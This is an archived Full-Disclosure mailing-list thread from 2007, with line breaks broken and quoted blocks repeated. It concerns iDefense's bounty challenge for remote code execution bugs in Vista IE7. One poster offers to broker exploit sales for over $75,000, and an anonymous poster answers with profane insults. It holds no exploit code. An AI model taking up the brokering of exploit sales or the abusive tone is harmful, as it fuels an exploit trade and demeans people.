know someone who will pay significantly more per
vulnerability
against the
same targets.
On 1/10/07 12:27 PM, contributor Contributoridefense.com
wrote:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Also available at:
http://labs.idefense.com/vcp/challenge.php#more_q1+2007%3A+vulnerab
i
lity+chall
enge
*Challenge Focus: Remote Arbitrary Code Execution
Vulnerabilities
in
Vista IE 7.0*
On Fri, 19 Jan 2007 00:43:50 -0500 Simon Smith
[EMAIL PROTECTED]
wrote:
Nobody ever said that 75,000.00 was a price for a remote
vista
bug.
On 1/18/07 8:39 PM, [EMAIL PROTECTED]
[EMAIL PROTECTED]
wrote:
This is complete bullshit nothing more than a social
engineering
honey pot to get bugs and vulns for their own use, this
company
couldn't affort 75.ooo USD if they tried, they cannot even
find
their own bugs, they got 4 or 5 shitty reasearch and
vuln
findings of thier own, that's it.
75.000 for a remote vista ie7 xploit, guaranteed you wont
find
it
and if you do they won't pay
lose lose :(
jigga
yo
Concerned about your privacy? Instantly send FREE secure
email,
no account
required
http://www.hushmail.com/send?l=480
Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-
charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Concerned about your privacy? Instantly send FREE secure
email,
no account
required
http://www.hushmail.com/send?l=480
Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485
Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE
Stick to beer, hard liquor seems to make you an angry drunk.
-sb
On 1/19/07, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:
Of course you will, the companhy you sell to never found more
than 4 vulns in their existence.
You're the cheap sales man selling insurance, where's your
USD750.ooo vuln EXPERT VULN GUY ?
No where, and neither the shithole comany, which is yours, ever
passed even 1 UsD through your company if you can even call itthat;
RE-RESQUET. YOUR LAWYER NOTIFICATION ON HIS HEADED NOTE PAPER YOU
SUCCESSFULLHY TRANSACTED EVEN ONE DEAL IN THIS FRAIME,
RE-RE-REQUEST YOUR LAWYER OR ACCOUNTING THAT EVEN YOU OR YOUR ROXY
COMANY R THE COMPANY BEHIND IT EVEN HAS THE MEANS TO DELIVER
USD750.OOO AT ALL PER YOUR CLAIM AND PROMISE AS WRITEN BY YOU ON FD
STATING SO.
]
HYOUR FAILURE TO DO SO OR PROOF EITHER OR, WILL NULL AND VOID YOU
AND RECONFIRM YOU AND YOUR '[AFFLIATES]' ARE FRAUDS
On Fri, 19 Jan 2007 01:52:06 -0500 Simon Smith [EMAIL PROTECTED]
wrote:
You're right... I'll start ignoring you now. ;)
On 1/19/07 1:50 AM, [EMAIL PROTECTED]
[EMAIL PROTECTED]
wrote:
typical con artist - worng focus FUCKFACE
PROOF YOUR BONA FIDES VIA .LAWYER OR .ACCUNTANT. EVEN ONE NICKEL
GIVEN FOR A VULN. LET ALONE 750 MILLION.
On Fri, 19 Jan 2007 01:42:43 -0500 Simon Smith
[EMAIL PROTECTED]
wrote:
Dumbass, you must be a part of the n3td3v ccr3w or something.
How did you go from 75,000 to 750,000?
On 1/19/07 1:38 AM, [EMAIL PROTECTED]
[EMAIL PROTECTED]
wrote:
Number one:
1. An affidavit from your soliciters or accountant's that
USD750.000 has ever been dispensed through your company or
your
proxy company
2. An affidavit from your solictier's or accounttants, that
you,
your so-called client (who is you sno shit) have ever paid
out
upto 750.ooo usd {citing in some cases}
PUT UP SHUT UP OR FUCK OFF. YOU COULDN'T FIND A VULN IF YOU
TRIED.
PROOF EVERY ONE WRONG LOUD MOUTH.
On Fri, 19 Jan 2007 01:31:51 -0500 Simon Smith
[EMAIL PROTECTED]
wrote:
Dear NoBalls,
What specifically is a fuckface anyway and why are you
hiding behind
an anonymous email account?
More importantly, my words were not:
SAME TARGETS: ie7 VISTA 8k, I know someone who will pay much
for
up
to 75 for the same.
Hell that sentence doesn't even make any sense! What the heck
does
much for
up to 75 for the same even mean?
My EXACT words were:
Amen!
KF is 100% on the money. I can arrange the legitimate
purchase
of most
working exploits for significantly more money than iDefense,
In
some cases
over $75,000.00 per purchase. The company that I am working
with
has a
relationship with a legitimate buyer, all transactions are
legal.
If you're
interested contact me and we'll get the ball rolling.
-Simon
$8000.00 USD is low!
-End of my words-
;]
On 1/19/07 1:05 AM, [EMAIL PROTECTED]
[EMAIL PROTECTED]
wrote:
SAME TARGETS: ie7 VISTA 8k, I know someone who will pay much
for
up
to 75 for the same. YOUR WORDS FUCKFACE
ST00PID LYING CUNT!
I can arrange the legitimate purchase of most
working exploits for significantly more money than iDefense,
In
some cases
over $75,000.00 per purchase.
Re: [Full-disclosure] iDefense Q-1 2007 Challenge
From: Simon Smith (simonsnosoft.com)
Date: Tue Jan 16 2007 - 11:14:56 CST
know someone who will pay significantly more per
vulnerability
against the
same targets.
On 1/10/07 12:27 PM, contributor Contributoridefense.com
wrote:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Also available at:
http://labs.idefense.com/vcp/challenge.php#more_q1+2007%3A+vulnerab
i
lity+chall
enge
*Challenge Focus: Remote Arbitrary Code Execution
Vulnerabilities
in
Vista IE 7.0*
On Fri, 19 Jan 2007 00:43:50 -0500 Simon Smith
[EMAIL PROTECTED]
wrote:
Nobody ever said that 75,000.00 was a price for a remote
vista
bug.
On 1/18/07 8:39 PM, [EMAIL PROTECTED]
[EMAIL PROTECTED]
wrote:
This is complete bullshit nothing more than a social
engineering
honey pot to get bugs and vulns for their own use, this
company
couldn't affort 75.ooo USD if they tried, they cannot even
find
their own bugs, they got 4 or 5 shitty reasearch and
vuln
findings of thier own, that's it.
75.000 for a remote vista ie7 xploit, guaranteed you wont
find
it
and if you do they won't pay
lose lose :(
jigga
yo
Concerned about your privacy? Instantly send FREE secure
email,
no account
required
http://www.hushmail.com/send?l=480
Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-
charter.html
Hosted and sponsored by Secunia -
